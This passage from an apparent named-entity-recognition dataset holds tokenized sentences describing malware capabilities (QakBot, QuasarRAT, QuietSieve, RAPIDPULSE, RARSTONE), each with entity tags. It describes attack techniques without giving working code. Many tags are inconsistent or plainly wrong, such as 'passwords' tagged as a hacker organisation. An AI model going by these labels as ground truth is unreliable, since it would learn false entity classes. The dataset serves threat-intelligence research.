"via", - "HTML", - "smuggling." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "placed", - "its", - "payload", - "in", - "hidden", - "subdirectories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "make", - "small", - "changes", - "to", - "itself", - "in", - "order", - "to", - "change", - "its", - "checksum", - "and", - "hash", - "value." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "the", - "ability", - "to", - "download", - "additional", - "components", - "and", - "malware." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "measure", - "the", - "download", - "speed", - "on", - "a", - "targeted", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "QakBot", - "web", - "inject", - "module", - "can", - "inject", - "Java", - "Script", - "into", - "web", - "banking", - "pages", - "visited", - "by", - "the", - "victim." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "capture", - "keystrokes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "stored", - "stolen", - "emails", - "and", - "other", - "data", - "into", - "new", - "folders", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "target", - "and", - "steal", - "locally", - "stored", - "emails", - "to", - "support", - "thread", - "hijacking", - "phishing", - "campaigns." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "B-Features", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "<code>net", - "localgroup</code>", - "to", - "enable", - "discovery", - "of", - "local", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "gained", - "execution", - "through", - "users", - "opening", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "gained", - "execution", - "through", - "users", - "opening", - "malicious", - "links." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "been", - "packaged", - "in", - "ISO", - "files", - "in", - "order", - "to", - "bypass", - "Mark", - "of", - "the", - "Web", - "(MOTW)", - "security", - "measures." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "QakBot", - "payload", - "has", - "been", - "disguised", - "as", - "a", - "PNG", - "file", - "and", - "hidden", - "within", - "LNK", - "files", - "using", - "a", - "Microsoft", - "File", - "Explorer", - "icon." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "modify", - "the", - "Registry", - "to", - "store", - "its", - "configuration", - "information", - "in", - "a", - "randomly", - "named", - "subkey", - "under", - "<code>HKCU\\Software\\Microsoft</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "MSIExec", - "to", - "spawn", - "multiple", - "cmd.exe", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "<code>GetProcAddress</code>", - "to", - "help", - "delete", - "malicious", - "strings", - "from", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "<code>net", - "share</code>", - "to", - "identify", - "network", - "shares", - "for", - "use", - "in", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "the", - "ability", - "use", - "TCP", - "to", - "send", - "or", - "receive", - "C2", - "packets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "hidden", - "code", - "within", - "Excel", - "spreadsheets", - "by", - "turning", - "the", - "font", - "color", - "to", - "white", - "and", - "splitting", - "it", - "across", - "multiple", - "cells." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "identify", - "peripheral", - "devices", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "PowerShell", - "to", - "download", - "and", - "execute", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "the", - "ability", - "to", - "check", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "process", - "hollowing", - "to", - "execute", - "its", - "main", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "inject", - "itself", - "into", - "processes", - "including", - "explore.exe,", - "Iexplore.exe,", - "Mobsync.exe.,", - "and", - "wermgr.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "QakBot", - "proxy", - "module", - "can", - "encapsulate", - "SOCKS5", - "protocol", - "within", - "its", - "own", - "proxy", - "protocol." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "maintain", - "persistence", - "by", - "creating", - "an", - "auto-run", - "Registry", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "Regsvr32", - "to", - "execute", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "identify", - "remote", - "systems", - "through", - "the", - "<code>net", - "view</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "the", - "ability", - "to", - "use", - "removable", - "drives", - "to", - "spread", - "through", - "compromised", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "B-Purp", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "used", - "Rundll32.exe", - "to", - "drop", - "malicious", - "DLLs", - "including", - "Brute", - "Ratel", - "C4", - "and", - "to", - "enable", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "the", - "ability", - "to", - "create", - "scheduled", - "tasks", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "identify", - "the", - "installed", - "antivirus", - "product", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "enumerate", - "a", - "list", - "of", - "installed", - "programs." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "encrypt", - "and", - "pack", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "spread", - "through", - "emails", - "with", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "spread", - "through", - "emails", - "with", - "malicious", - "links." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "Base64", - "encode", - "system", - "information", - "sent", - "to", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "the", - "ability", - "to", - "capture", - "web", - "session", - "cookies." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "RC4", - "encrypt", - "strings", - "in", - "C2", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "check", - "the", - "compromised", - "host", - "for", - "the", - "presence", - "of", - "multiple", - "executables", - "associated", - "with", - "analysis", - "tools", - "and", - "halt", - "execution", - "if", - "any", - "are", - "found." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "collect", - "system", - "information", - "including", - "the", - "OS", - "version", - "and", - "domain", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "<code>net", - "config", - "workstation</code>,", - "<code>arp", - "-a</code>,", - "`nslookup`,", - "and", - "<code>ipconfig", - "/all</code>", - "to", - "gather", - "network", - "configuration", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "<code>netstat</code>", - "to", - "enumerate", - "current", - "network", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "identify", - "the", - "user", - "name", - "on", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "identify", - "the", - "system", - "time", - "on", - "a", - "targeted", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "QakBot", - "dropper", - "can", - "delay", - "dropping", - "the", - "payload", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "VBS", - "to", - "download", - "and", - "execute", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "QakBot", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "and", - "HTTPS", - "in", - "communication", - "with", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "use", - "cmd.exe", - "to", - "launch", - "itself", - "and", - "to", - "execute", - "multiple", - "C2", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "execute", - "WMI", - "queries", - "to", - "gather", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "QakBot", - "can", - "remotely", - "create", - "a", - "temporary", - "service", - "on", - "a", - "target", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "generate", - "a", - "UAC", - "pop-up", - "Window", - "to", - "prompt", - "the", - "target", - "user", - "to", - "run", - "a", - "command", - "as", - "the", - "administrator." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "QuasarRAT", - ".dll", - "file", - "is", - "digitally", - "signed", - "by", - "a", - "certificate", - "from", - "AirVPN." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "obtain", - "passwords", - "from", - "FTP", - "clients." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "obtain", - "passwords", - "from", - "common", - "FTP", - "clients." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "obtain", - "passwords", - "from", - "common", - "web", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "retrieve", - "files", - "from", - "compromised", - "client", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "has", - "the", - "ability", - "to", - "set", - "file", - "attributes", - "to", - "\"hidden\"", - "to", - "hide", - "files", - "from", - "the", - "compromised", - "user's", - "view", - "in", - "Windows", - "File", - "Explorer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "hide", - "process", - "windows", - "and", - "make", - "web", - "requests", - "invisible", - "to", - "the", - "compromised", - "user.", - "Requests", - "marked", - "as", - "invisible", - "have", - "been", - "sent", - "with", - "user-agent", - "string", - "`Mozilla/5.0", - "(Macintosh;", - "Intel", - "Mac", - "OS", - "X", - "10_9_3)", - "AppleWebKit/537.75.14", - "(KHTML,", - "like", - "Gecko)", - "Version/7.0.3", - "Safari/7046A194A`", - "though", - "QuasarRAT", - "can", - "only", - "be", - "run", - "on", - "Windows", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "download", - "files", - "to", - "the", - "victim’s", - "machine", - "and", - "execute", - "them." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "has", - "a", - "built-in", - "keylogger." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "QuasarRAT", - "has", - "a", - "command", - "to", - "edit", - "the", - "Registry", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "use", - "TCP", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "use", - "port", - "4782", - "on", - "the", - "compromised", - "host", - "for", - "TCP", - "callbacks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "communicate", - "over", - "a", - "reverse", - "proxy", - "using", - "SOCKS5." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "If", - "the", - "QuasarRAT", - "client", - "process", - "does", - "not", - "have", - "administrator", - "privileges", - "it", - "will", - "add", - "a", - "registry", - "key", - "to", - "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "has", - "a", - "module", - "for", - "performing", - "remote", - "desktop", - "access." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "contains", - "a", - ".NET", - "wrapper", - "DLL", - "for", - "creating", - "and", - "managing", - "scheduled", - "tasks", - "for", - "maintaining", - "persistence", - "upon", - "reboot." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "uses", - "AES", - "with", - "a", - "hardcoded", - "pre-shared", - "key", - "to", - "encrypt", - "network", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "gather", - "system", - "information", - "from", - "the", - "victim’s", - "machine", - "including", - "the", - "OS", - "type." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "determine", - "the", - "country", - "a", - "victim", - "host", - "is", - "located", - "in." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "has", - "the", - "ability", - "to", - "enumerate", - "the", - "Wide", - "Area", - "Network", - "(WAN)", - "IP", - "through", - "requests", - "to", - "ip-api[.]com,", - "freegeoip[.]net,", - "or", - "api[.]ipify[.]org", - "observed", - "with", - "user-agent", - "string", - "`Mozilla/5.0", - "(Windows", - "NT", - "6.3;", - "rv:48.0)", - "Gecko/20100101", - "Firefox/48.0`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "enumerate", - "the", - "username", - "and", - "account", - "type." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "perform", - "webcam", - "viewing." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuasarRAT", - "can", - "launch", - "a", - "remote", - "shell", - "to", - "execute", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuietSieve", - "can", - "collect", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuietSieve", - "can", - "search", - "files", - "on", - "the", - "target", - "host", - "by", - "extension,", - "including", - "doc,", - "docx,", - "xls,", - "rtf,", - "odt,", - "txt,", - "jpg,", - "pdf,", - "rar,", - "zip,", - "and", - "7z." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "QuietSieve", - "has", - "the", - "ability", - "to", - "execute", - "payloads", - "in", - "a", - "hidden", - "window." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuietSieve", - "can", - "download", - "and", - "execute", - "payloads", - "on", - "a", - "target", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuietSieve", - "can", - "check", - "C2", - "connectivity", - "with", - "a", - "`ping`", - "to", - "8.8.8.8", - "(Google", - "public", - "DNS)." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuietSieve", - "can", - "identify", - "and", - "search", - "networked", - "drives", - "for", - "specific", - "file", - "name", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuietSieve", - "can", - "identify", - "and", - "search", - "removable", - "drives", - "for", - "specific", - "file", - "name", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuietSieve", - "has", - "taken", - "screenshots", - "every", - "five", - "minutes", - "and", - "saved", - "them", - "to", - "the", - "user's", - "local", - "Application", - "Data", - "folder", - "under", - "`Temp\\SymbolSourceSymbols\\icons`", - "or", - "`Temp\\ModeAuto\\icons`." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "QuietSieve", - "can", - "use", - "HTTPS", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RAPIDPULSE", - "retrieves", - "files", - "from", - "the", - "victim", - "system", - "via", - "encrypted", - "commands", - "sent", - "to", - "the", - "web", - "shell." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RAPIDPULSE", - "listens", - "for", - "specific", - "HTTP", - "query", - "parameters", - "in", - "received", - "communications.", - "If", - "specific", - "parameters", - "match,", - "a", - "hard-coded", - "RC4", - "key", - "is", - "used", - "to", - "decrypt", - "the", - "HTTP", - "query", - "paremter", - "<code>hmacTime</code>.", - "This", - "decrypts", - "to", - "a", - "filename", - "that", - "is", - "then", - "open,", - "read,", - "encrypted", - "with", - "the", - "same", - "RC4", - "key,", - "base64-encoded,", - "written", - "to", - "standard", - "out,", - "then", - "passed", - "as", - "a", - "response", - "to", - "the", - "HTTP", - "request." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RAPIDPULSE", - "has", - "the", - "ability", - "to", - "RC4", - "encrypt", - "and", - "base64", - "encode", - "decrypted", - "files", - "on", - "compromised", - "servers", - "prior", - "to", - "writing", - "them", - "to", - "stdout." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RAPIDPULSE", - "is", - "a", - "web", - "shell", - "that", - "is", - "capable", - "of", - "arbitrary", - "file", - "read", - "on", - "targeted", - "web", - "servers", - "to", - "exfiltrate", - "items", - "of", - "interest", - "on", - "the", - "victim", - "device." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "decrypting", - "itself", - "in", - "memory,", - "RARSTONE", - "downloads", - "a", - "DLL", - "file", - "from", - "its", - "C2", - "server", - "and", - "loads", - "it", - "in", - "the", - "memory", - "space", - "of", - "a", - "hidden", - "Internet", - "Explorer", - "process.", - "This", - "“downloaded”", - "file", - "is", - "actually", - "not", - "dropped", - "onto", - "the", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RARSTONE", - "obtains", - "installer", - "properties", - "from", - "Uninstall", - "Registry", - "Key", - "entries", - "to", - "obtain", - "information", - "about", - "installed", - "applications", - "and", - "how", - "to", - "uninstall", - "certain", - "applications." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RARSTONE", - "downloads", - "its", - "backdoor", - "component", - "from", - "a", - "C2", - "server", - "and", - "loads", - "it", - "directly", - "into", - "memory." - ], - "ner_tags": [ 